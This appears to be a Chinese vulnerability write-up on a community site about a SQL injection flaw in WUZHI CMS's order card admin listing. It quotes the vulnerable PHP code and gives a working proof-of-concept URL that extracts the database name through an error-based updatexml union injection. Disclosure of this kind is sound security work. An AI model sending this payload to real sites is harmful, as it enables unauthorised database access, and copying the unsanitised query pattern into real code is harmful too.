漏洞文件:
/coreframe/app/order/admin/card.php:21-45
public function listing() {
$page = isset($GLOBALS['page']) ? intval($GLOBALS['page']) : 1;
$page = max($page,1);
$batchid = isset($GLOBALS['batchid']) ? $GLOBALS['batchid'] : 0;
$keytype = isset($GLOBALS['keytype']) ? $GLOBALS['keytype'] : 0;
$keywords = isset($GLOBALS['keywords']) ? trim($GLOBALS['keywords']) : '';
$where = $batchid ? "`batchid`='$batchid'" : '';
if($keytype==0 && $keywords) {
$where = "card_no LIKE '$keywords%'";
} elseif($keytype==1 && $keywords) {
$r = $this->db->get_one('member', array('username' => $keywords));
if($r) {
$uid = $r['uid'];
$where = "uid = '$uid'";
} else {
MSG('用户不存在',HTTP_REFERER);
}
}
$result = $this->db->get_list('order_card', $where, '*', 0, 20,$page,'cardid DESC');
$pages = $this->db->pages;
$total = $this->db->number;
$status_arr = array('<b>待发送</b>','未预约','已预约');
include $this->template('card_listing');
}
card.php文件中,参数$keytype和方法$keywords下的参数listing是可控的,$keywords参数没有严格过滤,造成SQL注入漏洞!
POC
/index.php?m=order&f=card&_su=wuzhicms&v=listing&keytype=0&keywords=11111'/**/and/**/1=1/**/union/**/SELECT/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -
感谢您的来访,获取更多精彩文章请收藏本站。
© 版权声明
本站网络名称:
孤勇者社区
本站永久网址:
https://www.gyzsq.com
网站侵权说明:
本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长QQ324470778删除处理。
1 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
2 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
3 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
1 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
2 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
3 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
THE END
喜欢就支持一下吧
相关推荐
评论 共1条
欢迎您留下宝贵的见解!
- 最新
- 最热
只看作者